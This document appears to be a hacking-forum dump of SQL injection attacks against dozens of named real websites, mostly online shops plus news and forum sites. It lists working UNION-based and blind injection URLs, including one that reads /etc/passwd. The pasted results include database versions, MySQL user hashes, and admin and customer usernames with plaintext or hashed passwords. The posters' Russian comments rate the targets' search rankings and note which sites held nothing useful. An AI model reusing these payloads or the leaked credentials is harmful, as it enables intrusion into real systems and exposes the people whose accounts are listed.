_http://www.aussiepcshop.com/product_info.php/cPath/44/products_id/161' _http://woohoo.aussiepcshop.com/phpmyadmin/ _http://payments.aussiepcshop.com/phpmyadmin/index.php ----------------------------- _http://www.airsideshop.com/product.php?id=316%20order%20by%204+--+ ----------------------------- _http://www.tannenbaumholidayshop.com/store.cfm?SearchType=Cat&Searchterm=11' ----------------------------- _http://www.knifeshop.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1&kat_aktiv=357&Ziel_ID=4310'&javascript_enabled=true&PEPPERSESS=65df5b010c16ad29aef8f3519684b2f5&w=1366&h=716#Ziel4310 ----------------------------- _http://www.worstpreviews.com/review.php?id=67' ----------------------------- _http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,host),8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+limit+6,1/* _http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,USER(),VERSION(),DATABASE()),8,9,10,11,12,13,14,15,16,17,18,19,20,21/* web@localhost :: 4.0.15-log :: century _http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+limit+0,1/* root::2e4fe35a29f3f92f::herbert rick::5c96ea97620d605c:: mdcback::43334d0c52429114::backup florian::2941613d4db7badf:: testuser::7dcda0d57290b453::testpass florian2::2941613d4db7badf:: flowb::43b140e955182c71:: david:: _http://www.19thcenturyshop.com/apps/catalogitem?id=-496+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,user,host),8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user+limit+0,1/* florian::% florian2::% sethh::% testuser::% tony::% flowb::207.22.66.13 replicant::207.22.66.178 david::207.22.66.230 mediatwo::207.22.66.27 mediatwo::207.22.66.71 web::69.7.74.77 david::ats david::localhost mdc_sync::localhost ------------------------------- _http://www.trikeshop.com/shop_details.php?id=270+order+by+10/* 
_http://www.trikeshop.com/shop_details.php?id=-270+union+select+1,2,3,4,concat_ws(0x3a3a,VERSION(),USER(),DATABASE()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 4.1.20-log :: [email protected] :: 334558_trikeshop _http://www.trikeshop.com/shop_details.php?id=-270+union+select+1,2,3,4,load_file(0x2f6574632f706173737764),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+news/* ------------------------------- _http://www.krsaddleshop.com/jump.jsp?itemType=CATEGORY&itemID=21'&path=1 ------------------------------- _http://www.wowshop.com.ua/index.php?productID=640' ------------------------------- _http://www.broderbund.com/jump.jsp?itemID=1670'&mainPID=1670&itemType=PRODUCT&path=1%2C2%2C6%2C413&iProductID=1670 ------------------------------- _http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=89+order+by+100/* _http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a3a,VERSION(),DATABASE(),USER()),16,17/* _http://www.the-spontaneity-shop.com/shows/show_details.html?show_id=-89+union+select+1,2,3,4,5,6,7,8,9,username,password,12,13,14,concat_ws(0x3a3a,VERSION(),DATABASE(),USER()),16,17+from+user+limit+0,1/* tomsalinsky:0b37d5345cdb88b60219337856bc0256::slithy deborah, 2fe7cec3131fa9662906ecfb2eac8a49::moose 4.1.20::the-spontaneity-shop_com::tom@localhost -------------------------------- _http://www.dutchtradeshop.com/store/itemDetail.php?itemID=10023' -------------------------------- _http://www.lobbsfarmshop.com/ShowDetails.asp?id=1794' -------------------------------- _http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+1,@@VERSION,3,4--#p _http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+union+select+all+1,column_name,table_name,4+from+information_schema.columns--#p 
_http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+OR+1=(SELECT+TOP+1+table_name+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_name+NOT+IN+('ProductTbl~bak',%20'CategoryTbl','CategoryTbltest','CategoryTypeTbl','CategoryTypeTbltest','emailTBL','emailTbltest','Order_Details','Order_Detailstest','OrderTbl','OrderTbltest','PricingTbl','PricingTbl~bak','PricingTblA','PricingTbltest','ProductTbl','ProductTblA','ProductTbltest','TestTBL','TrayPricingTbl','TreeList_Tmp','sysconstraints','syssegments'))-- http://www.astoriapastryshop.com/Product_Des.asp?ProductID=-33+OR+1=(SELECT+TOP+1+column_name+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='OrderTbl'+AND+column_name+NOT+IN+('orderID',%20'Name','Address1','Address2','City','State','Zip','Country','Phone','Mobile','Email'))-- Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ---------------------------------- _http://www.waltsbikeshop.com/outdoors/products/12/1081%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*/ _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,VERSION(),USER(),DATABASE()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/*/ 4.1.20::waltben4_walt@localhost::waltben4_publicWeb _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20users/*/ _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20news/*/ _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,user_login,user_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20users%20limit%200,1/*/ 
concat_ws(0x3a3a,user_id,user_login,user_password) 2::mdbendel::jgarcia <------ administrator 31::bikeguybob::kyle 44::lindsay::june078 9::dave::dave 10::sarah::lea 14::zach::shannon 16::cortez::cortez 29::shannoncanfield::bikes 30::jds::suckme 31::bikeguybob::kyle 33::mountainbkr14::viper 35::kdp::123 43::jdames::itsugar1 41::rex::theodore 42::cirvin::chrisbirvin 45::david::djszp5 46::mgwvd3::garth131 37::quickfeet18::dave11 40::will.verbarg::02291984 _http://www.waltsbikeshop.com/outdoors/products/12/10-81%20union%20select%201,2,3,4,concat_ws(0x3a3a,user_id,user_login,user_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20users%20where%20user_id=2/*/ _http://www.waltsbikeshop.com/admin/index.php --------------------------------- _http://www.graysflowershop.com/view-category.asp?cid=4' --------------------------------- _http://www.oldsweetshop.com/products.asp?CatID=127'&p=0 --------------------------------- _http://www.bagshop.com/store/cart_pages/gift_certficates.php?ID=4468' --------------------------------- _http://www.fentonartglass.com/shop/item.asp?item=DS197KI'%20OR%201=@@version-- --------------------------------- _http://www.1stopmarineshop.com/product_info.php?cPath=1607958'&products_id=20794484 --------------------------------- _http://www.dropshop.com/db/npwd_db_detail.php3?id_producto=51797' --------------------------------- _http://www.goldenmagnolia.com/deutsch/go.php?kategorieID=130'&no=1 ---------------------------------
tm.die-webber.com Code: http://tm.die-webber.com/tools/?login=narks1%22+UNION+SELECT+1,2,column_name,4,5,6,7,8,9+FROM+information_schema.columns+LIMIT+0,1/* таблы и пару колонок Code: compteur_visite (compteur,date,time,duree,ip) tmu_banlist tmu_boosters tmu_boostersUpdate tmu_challengers tmu_challenges tmu_players (login,nickname,path,team1,team2,team3,team4,team,update) tmu_servers tmu_teams tmu_tracks tmu_votes
Code: http://www.infn.it/news/newsen.php?id=-390+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* PR8 Тиц 650 Все таблицы просмотрел, ничего полезного не нашёл. Может у вас получится.
http://at.kz/?p=-1+union+select+1,2,version()/* 5.0.18-log http://at.kz/?p=-1+union+select+1,2,table_name+from+INFORMATION_SCHEMA.TABLES+limit+16,1/* есть таблица контент content И ВСЕ )))
www.computerworld.com.ua тИЦ = 130; PR = 5 Code: http://www.computerworld.com.ua/index_cw.php?in=komi_articles_id&id=-1+union+select+1,2,3,4,5,concat(version(),char(0x3A),database(),char(0x3A),user()),7,8,9,10,11,12,13,14,15/* version() - 4.1.22-log database() - comizdat3 user() - [email protected] Code: http://www.computerworld.com.ua/index_cw.php?in=komi_articles_id&id=-1+union+select+1,2,3,4,5,concat(login,char(0x3A),password),7,8,9,10,11,12,13,14,15+from+admin+limit+0,1/* admin:sdbgsbglodstre ----------------------------------------------------- www.russian.kiev.ua тИЦ = 230; PR = 4 Code: http://www.russian.kiev.ua/book.php?id=-1+union+select+version(),2,3,user(),5,6,database(),8,9,10,11-- version() - 5.0.67-log user() - [email protected] database() - russian есть таблица с паролями: Code: http://www.russian.kiev.ua/book.php?id=-1+union+select+concat(user_id,char(0x3A),login,char(0x3A),passwd),2,3,4,5,6,7,8,9,10,11+from+tbl_users+limit+0,1-- 17:root:root форум phpbb, но он не работает Code: http://www.russian.kiev.ua/book.php?id=-1+union+select+concat(user_id,char(0x3A),username,char(0x3A),user_password),2,3,4,5,6,7,8,9,10,11+from+phpbb_users+where+user_level=1+limit+0,1-- 2:admin_admin:0192023a7bbd73250516f069df18b500 ----------------------------------------------------- www.videotor.com тИЦ = 30; PR = 1 Code: http://www.videotor.com/post.php?id_post=-1+union+select+1,2,3,concat(version(),char(0x3A),database(),char(0x3A),user())/* version() - 5.0.45 database() - videotor_blog user() - videotor@localhost Code: http://www.videotor.com/post.php?id_post=-1+union+select+1,2,3,concat(login,char(0x3A),password)+from+users+limit+0,1/* Bot:ghbpthdfnbd Slayer:COUNTer oleg:ghbpthdfnbd sergey:kiskis
Шопчег. Дисками торгует. http://www.dirtcheapcds.com.au/viewContent.php?id=-31+union+select+1,2,concat_ws(0x3A3a,version(),database()),4,5/* 4.0.24_Debian-10ubuntu2-log::dirtcheap_db
http://www.spomir.ru/rass/spo_out&action=view_archive&id=-1%20union%20select%201,version(),3,4,5,6,7 Смотрим в хедер)
http://www.youplusw ephotography.com/blog/index.php?category=-3+union+select+1,concat_ws(0x3a,login,password,re g_date,last_date,sess),3+from+user s+limit+1,1-- http://tripleco rd.com/news/index.php?link=73&cat=-2+union+select+1,concat_ws(0x3a,login,password),3+from+users+limit+1,1-- http://www.kevin swan.com/slog/index.php?category=-3+union+select+1,concat_ws(0x3a,login,password),3+from+users-- http://www.shar alana.com/blog/index.php?link=20&cat=-4+union+select+1,concat_ws(0x3a,login,password),3+from+users-- http://www.beb bblog.com/index.php?category=-4+union+select+1,concat_ws(0x3a,login,password),3+from+users/*
Code: http://www.albanianroyalfamily.com/index.php?faqe=shfaqlajm&lajmid=-9999+union+all+select+1,2,convert(concat_ws(char(58),username,password)+using+utf8),4,null,6,null,8,9+from+login-- логин/пасс: Code: admin:mbreti ------------------------------------------- Code: http://www.gazeta-standard.com/tekst.php?idt=6342+and+1=2+union+all+select+1,concat(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+editor-- логин/пасс: Code: admin:62a90ccff3fd73694bf6281bb234b09a ------------------------------------------- Code: http://www.gazetaetiranes.com.al/print.php?lajmID=922'+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14+from+user/* логин/пасс: Code: admin-gt:2fa4b2f3e0acb4e59e02d060db05da74 ---------------------------------------------- Code: http://www.reutov.net/iss/photo_news/news/newsone.php?id=-394%20union%20select%201,2,3,4,concat_ws(char(58),name,pass),6,7,8,9+from+users+limit+1,1/* логин/пасс: Code: drupal:9536bdcd9e3faa581d6991b5d04ac4ec -------------------------------------------- Code: http://www.ktpae.gr/declaration_more.php?decl_id=-172+union+select+1,concat_ws(char(58),user,password),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+mysql.user/* логин/пасс: Code: root:*3225EBFDCE9E60181BB8157769BC1EF316DC15D0 --------------------------------------------- The End!
http://www.mapcentre.ru/index.php?productID=1276+or+ascii(lower(substr(version(),1,1)))=53--%20 5 ветка http://www.mapcentre.ru/index.php?productID=1276+or+ascii(lower(substr((select+table_name+from+INFORMATION_SCHEMA.TABLES+limit+16,1),1,1)))=118--%20 т.е. имя 16 таблицы начинается с буквы 'v', view))) ну и так далее, как говорится, курочка по зернышку....)
Code: http://www.comingsoon.net/films.php?id=11750+and+ascii(lower(substring(user(),1,1)))<=100+#+ user: comingso_nextra database: comingso_nextra version: 4 не дает юзать union select.
http://deti.mail.ru/nyanya?type=2+and+substring(version(),1,1)=4 version(): 4.0 http://deti.mail.ru/lineyki?edit=[id вашей созданной линейки]+and+substring(version(),1,1)=4
http://www.edreams.es/vueltaalmundo/post.php?id_post=1+union+select+ 1,2,concat_ws(0x3a3a,TABLE_NAME),4,5+from+information_schema.tables+l imit+25,2/* --------------------------------- table: usuario votos_final voto video ultimasvisitas postcomentario post perfil foto CHARACTER_SETS experiencia ed_languages ed_countries_text comentario VIEWS USER_PRIVILEGES TRIGGERS TABLE_PRIVILEGES TABLE_CONSTRAINTS TABLES STATISTICS SCHEMA_PRIVILEGES SCHEMATA ROUTINES KEY_COLUMN_USAGE COLUMN_PRIVILEGES COLUMNS COLLATION_CHARACTER_SET_APPLICABILITY COLLATIONS CHARACTER_SETS ---------------------- column: COLLATION_NAME MAXLEN DESCRIPTION DEFAULT_COLLATE_NAME CHARACTER_SET_NAME http://www.edreams.es/vueltaalmundo/post.php?id_post=1+union+select+ 1,2,concat_ws(0x3a3a,login,password),4,5+from+usuario+ limit+0,1/*
http://www.librenet.net/forum/post.php?id_post=652+union+select+1,2,concat_ws(0x3a3a,COLUMN_NAME),4,5,6,7,8+from+inf ormation_schem a.columns/*&id_topic=41 http://www.librenet.net/forum/post.p hp?id_post=652+union+select+1,2,concat_ws(0x3a3a,pass_user,login_user),4,5,6,7,8+from +user/*&id_topic=41 columnass_user login_user table:USER_PRIVILEGES administre_serveur moderation user c3dric::6cc8260ee2bcc56083a35cd98b775f02(23041983)
http://belarusgo.com/view_subsection.php?page=2&id_subsection=68&id_city=9&id_section=-13+union+s elect+1,2,concat_ws(0x3a3a,login_user,password_user),4,5,6 +from+user--